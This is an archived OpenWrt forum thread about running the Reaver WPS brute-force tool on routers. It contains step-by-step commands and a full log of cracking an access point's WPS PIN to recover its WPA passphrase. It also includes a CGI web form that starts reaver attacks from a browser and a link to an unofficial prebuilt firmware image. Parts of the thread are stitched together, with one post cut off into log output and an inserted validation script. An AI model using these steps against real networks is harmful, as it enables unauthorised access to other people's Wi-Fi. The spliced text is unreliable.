OpenWrt Forum Archive

Topic: Reaver WPS

The content of this topic has been archived between 2 Apr 2018 and 14 Apr 2018. There are no obvious gaps in this topic, but there may still be some posts missing at the end.

So I'm unlucky, and I cannot use reaver-wps, am I?

Thank you for helping me.

(Last edited by somla on 4 May 2012, 18:24)

Please post a Makefile for version 1.4. There are only 1.2 and 1.3, but they
  ] Waiting for beacon from xx: xx: xx: xx: xx: xx
[] Switching mon0 to channel 2
[] Switching mon0 to channel 3
[] Switching mon0 to channel 4
[] Switching mon0 to channel 5
[] Switching mon0 to channel 6
[] Switching mon0 to channel 7
[] Switching mon0 to channel 8
[] Switching mon0 to channel 9
[] Switching mon0 to channel 10
[] Switching mon0 to channel 11
[] Switching mon0 to channel 12
[] Switching mon0 to channel 13
[] Switching mon0 to channel 14
[] Switching mon0 to channel 1
[] Switching mon0 to channel 2
[] Switching mon0 to channel 3
airmon-ng and airodump-ng start and run normally
Trendnet 673GRU (ar71xx), OpenWrt/trunk
Tested on an AP that has been hacked before

(Last edited by sakatgg on 11 Jun 2012, 15:30)

So no way of running this on big endian like Fonera or Atheros 7100 ?

Only BCM 2.6 works because it is little endian it seems ... ?

Reaver 1.4 worked completely on Buffalo WHR-G300N(Ralink RT3052) and OpenWRT trunk r30461

iwconfig wlan0 essid RalinkInitAP channel 6
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -b XX-XX-XX-XX-XX-XX -c 6 -vv
:
[+] 96.51% compl[10600.100000] device mon0 left promiscuous mode
ete @ 1970-01-01 02:56:40 (5 seconds/pin)
[10601.110000] device mon0 entered promiscuous mode
[+] Trying pin 12666126
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sen[10604.940000] device mon0 left promiscuous mode
ding M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[10605.950000] device mon0 entered promiscuous mode
[+] Trying pin 12666126
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[10610.060000] device mon0 left promiscuous mode

[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 10355 seconds
[+] WPS PIN: '12666126'
[+] WPA PSK: 'abcdefg12345678'
[+] AP SSID: 'RalinkInitAP'
root@OpenWrt:/#

It took about three hours.

Buffalo WHR-G300N (v1) CPU Ralink RT3052 is little endian.
CONFIG_CPU_LITTLE_ENDIAN=y
CONFIG_CPU_MIPS32=y

I would like to know why Reaver cannot run on big endian.

It would be pretty epic because then we can have the full arsenal of penetration testing tools for wireless working !

I made a simple web UI form for reaver-wps with Haserl.
I copied this CGI file to /www/cgi-bin/r.cgi in OpenWrt on the Buffalo WHR-G300N.
Start http://192.168.1.1/cgi-bin/r.cgi
Running reaver with the -D argument means it runs in the background (daemon).

#!/usr/bin/haserl
content-type: text/html

<html>
<body>
<form action="<? echo -n $SCRIPT_NAME ?>" method="POST">
<h1>Reaver Web UI Form</h1>
<input type=hidden name=action value=post>
<? #
   if [ "$GET_halt" = "on" ]; then
      echo -n "<pre>"
      pkill -f reaver
      rm /tmp/reaverlog
      airmon-ng stop mon0
      echo -n "<p>Reaver Stopped</p></pre>"
   fi
?>
<p>__essid_: <input type=text name=essid value="<? echo -n $FORM_essid ?>" size=20></p>
<p>__MAC_: <input type=text name=mac value="<? echo -n $FORM_mac ?>" size=20></p>
<p>channel: <input type=text name=ch value="<? echo -n $FORM_ch ?>" size=2></p>
<pre>
<? #
   if [ "$FORM_action" = "post" ]; then
       if ! [ -f /tmp/reaverlog ]; then
          # Quote the form fields so the shell cannot word-split or glob them
          iwconfig wlan0 essid "$FORM_essid" channel "$FORM_ch"
          ifconfig wlan0 up
          airmon-ng start wlan0
          reaver -i mon0 -b "$FORM_mac" -D -c "$FORM_ch" -o /tmp/reaverlog -vv
       fi
       tail -n 20 /tmp/reaverlog
?>
    </pre>
    <p><input type=submit value="Reload">
    <input type=button value="Stop" onClick="location.href='<? echo -n $SCRIPT_NAME ?>?halt=on'"></p>
<? else ?>
    <p><input type=submit value="Start"></p>
<? fi ?>
</form>
</body>
</html>

After starting this CGI form from a browser, Reaver runs on the router independently.

video is here
http://www.youtube.com/watch?v=aIPiBcH8FPo

(Last edited by atc500fast on 15 Aug 2012, 02:04)
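
The CGI above hands the request fields `$FORM_essid`, `$FORM_mac` and `$FORM_ch` to iwconfig and reaver without checking them, so a crafted value can reach those commands as extra arguments or options with the web server's privileges. An added example (not part of atc500fast's post) of validating the three fields in POSIX sh before use; the function names and the allowed ESSID character set are assumptions.

```shell
#!/bin/sh
# Added example: validate the three r.cgi form fields before they reach
# iwconfig/reaver. Function names and the ESSID character set are assumptions.
LC_ALL=C   # make the bracket ranges below plain ASCII

hex='[0-9A-Fa-f]'
essid_ok='A-Za-z0-9 _.-'   # conservative whitelist; widen only deliberately

# BSSID: exactly six colon-separated hex octets, nothing before or after.
valid_mac() {
    case "$1" in
        $hex$hex:$hex$hex:$hex$hex:$hex$hex:$hex$hex:$hex$hex) return 0 ;;
    esac
    return 1
}

# Channel: one or two digits, 1..14 (the range reaver hops through above).
valid_channel() {
    case "$1" in
        ''|*[!0-9]*|???*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# ESSID: 1..32 whitelisted characters, and never a leading '-' that a
# command could read as an option.
valid_essid() {
    case "$1" in
        ''|-*|*[!$essid_ok]*) return 1 ;;
    esac
    [ "${#1}" -le 32 ]
}

# Returns 0 only if all three fields are acceptable; prints the first failure.
check_form() {   # usage: check_form "$FORM_essid" "$FORM_mac" "$FORM_ch"
    valid_essid "$1"   || { echo "bad essid";   return 1; }
    valid_mac "$2"     || { echo "bad mac";     return 1; }
    valid_channel "$3" || { echo "bad channel"; return 1; }
}
```

In the CGI, the call would sit directly after the `FORM_action` test, with the iwconfig and reaver lines running only when `check_form` returns 0.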

As mentioned in the reaver bugtrack, http://code.google.com/p/reaver-wps/issues/detail?id=46 , reaver is in the trunk now (feed package, net/reaver). The patches should fix the big-endian problem.
However it doesn't work for me on tp-link wr1043nd.
Can anyone test it?

Has anyone tried it on the old Fonera 2100?
It would be very interesting to leave it running with a battery pack and a solar panel.

(Last edited by verysofttoiletpaper on 15 Feb 2013, 21:43)

r.cgi does not start on TP-Link 1043ND

To revive the topic: I've done everything as described. Double-checked. When I start r.cgi there's output saying that there's no such directory and it cannot start the CGI program.
I'm using Wrap 1E with latest Attitude Adjustment 12,09 x86.

Forgive me for my noobness, but how can I implement this HTML code, @atc500fast?
Thanks

mikrostart wrote:

When I start r.cgi there's output saying that there's no such directory and it cannot start the CGI program.

To make reaver.cgi work, you have to install haserl:
opkg install haserl

micsux wrote:
mikrostart wrote:

When I start r.cgi there's output saying that there's no such directory and it cannot start the CGI program.

To make reaver.cgi work, you have to install haserl:
opkg install haserl

Do I just need to install this package, put the .cgi in the right folder, then run it from a web browser?

henrique.h12 wrote:

Do I just need to install this package, put the .cgi in the right folder, then run it from a web browser?

Exactly

micsux wrote:
henrique.h12 wrote:

Do I just need to install this package, put the .cgi in the right folder, then run it from a web browser?

Exactly

I have this error:

Access to this resource is forbidden

I set up the right to 0755 and got this:
Unable to launch the requested CGI program:
  /www/cgi-bin/r.cgi: No such file or directory

totally lost here ;/

micsux wrote:
henrique.h12 wrote:

Do I just need to install this package, put the .cgi in the right folder, then run it from a web browser?

Exactly

Could you please help me?
Thanks.

reaver 1.5.2 community mod compiled and tested on ramips, also with older libpcap revision should run without segfaults. the image it is included in has been modified for testing purposes and some things may be wrong or non working for you. (mainly 2.4 wifi)

you know how to run it wink

http://www54.zippyshare.com/v/YPPxkHoD/file.html

The discussion might have continued from here.